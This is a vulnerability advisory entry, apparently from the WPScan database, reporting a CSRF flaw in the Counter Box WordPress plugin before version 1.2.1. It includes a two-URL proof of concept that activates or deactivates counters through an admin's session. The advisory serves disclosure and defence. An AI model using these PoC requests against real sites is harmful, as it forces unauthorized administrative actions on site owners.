Lucene search

K
wpvulndbRaad Haddad of Cloudyrion GmbHWPVDB-ID:33705003-1F82-4B0C-9B4B-D4DE75DA309C
HistoryJul 08, 2022 - 12:00 a.m.

Counter Box < 1.2.1 - Arbitrary Counter Activation/Deactivation via CSRF

2022-07-0800:00:00
Raad Haddad of Cloudyrion GmbH
wpscan.com
11
csrf protection
plugin security
attack prevention
counter box
authorization vulnerability

EPSS

0.001

Percentile

43.4%

The plugin is lacking CSRF check when activating and deactivating counters, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

PoC

https://example.com/wp-admin/admin.php?page=counter-box&amp;id;=1&amp;action;=activate https://example.com/wp-admin/admin.php?page=counter-box&amp;id;=1&amp;action;=deactivate

EPSS

0.001

Percentile

43.4%

Related for WPVDB-ID:33705003-1F82-4B0C-9B4B-D4DE75DA309C